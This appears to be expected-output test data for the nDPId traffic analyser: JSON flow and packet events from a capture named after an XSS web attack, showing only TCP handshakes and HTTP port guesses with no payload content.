-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348010145,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348010145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81alAAD4G8CasEAABwKgKMojMAFACvDRcAAAAAKACchC7nQAAAgQFtAQCCAoBPOH1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":2,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiMxKQ6iIArw0XaAScSASYQAAAgQFtAQCCAoD5rNpATzh9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":3,"flow_last_seen":1499348010146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348010146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01apAAD4G8C2sEAABwKgKMojMAFACvDRdSkOoiYAQAOWxZwAAAQEICgE84fYD5rNp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348011433,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348011433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMojaAFB2oBTCAAAAAKACchBmAwAAAgQFtAQCCAoBPOM3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":2,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiNplHDbhdqAUw6AScSASUwAAAgQFtAQCCAoD5rSrATzjNwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":3,"flow_last_seen":1499348011433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMojaAFB2oBTDZRw24oAQAOWxWgAAAQEICgE84zcD5rSr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348012728,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348012728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbdAAD4GlBmsEAABwKgKMojoAFBoxNXMAAAAAKACchCxggAAAgQFtAQCCAoBPOR7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":2,"flow_last_seen":1499348012728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiOhwV55UaMTVzaAScSDp3wAAAgQFtAQCCAoD5rXvATzkewEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":3,"flow_last_seen":1499348012729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348012729,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbhAAD4GlCCsEAABwKgKMojoAFBoxNXNcFeeVYAQAOWI5wAAAQEICgE85HsD5rXv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348015250,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348015250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SaJAAD4GfC6sEAABwKgKMokCAFA1NK9QAAAAAKACchAI\/gAAAgQFtAQCCAoBPObyAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":2,"flow_last_seen":1499348015250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiQJJKiEWNTSvUaAScSDjTwAAAgQFtAQCCAoD5rhmATzm8gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":3,"flow_last_seen":1499348015251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348015251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SaNAAD4GfDWsEAABwKgKMokCAFA1NK9RSSohF4AQAOWCVwAAAQEICgE85vID5rhm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348016526,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348016526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82X9AAD4G7FCsEAABwKgKMokQAFAj2zFPAAAAAKACchCXDAAAAgQFtAQCCAoBPOgwAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":2,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiRBmO\/1xI9sxUKAScSB2swAAAgQFtAQCCAoD5rmkATzoMAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":3,"flow_last_seen":1499348016526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02YBAAD4G7FesEAABwKgKMokQAFAj2zFQZjv9coAQAOUVugAAAQEICgE86DED5rmk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348019059,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019059,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bDdAAD4GWZmsEAABwKgKMokqAFBENIadAAAAAKACchAe0QAAAgQFtAQCCAoBPOqqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":2,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiSoKVvNnRDSGnqAScSBh7QAAAgQFtAQCCAoD5rweATzqqgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":3,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bDhAAD4GWaCsEAABwKgKMokqAFBENIaeClbzaIAQAOUA9QAAAQEICgE86qoD5rwe"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348020357,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348020357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MF5AAD4GlXKsEAABwKgKMok4AFAr8NuwAAAAAKACchDgrwAAAgQFtAQCCAoBPOvuAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":2,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiTgvWFvMK\/DbsaAScSCVIQAAAgQFtAQCCAoD5r1iATzr7gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":3,"flow_last_seen":1499348020358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348020358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MF9AAD4GlXmsEAABwKgKMok4AFAr8NuxL1hbzYAQAOU0KQAAAQEICgE86+4D5r1i"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348021660,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348021660,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T85AAD4GdgKsEAABwKgKMolGAFAJiKL6AAAAAKACchA6egAAAgQFtAQCCAoBPO00AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":2,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiUb24raMCYii+6AScSDLWgAAAgQFtAQCCAoD5r6oATztNAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":3,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T89AAD4GdgmsEAABwKgKMolGAFAJiKL79uK2jYAQAOVqYgAAAQEICgE87TQD5r6o"} 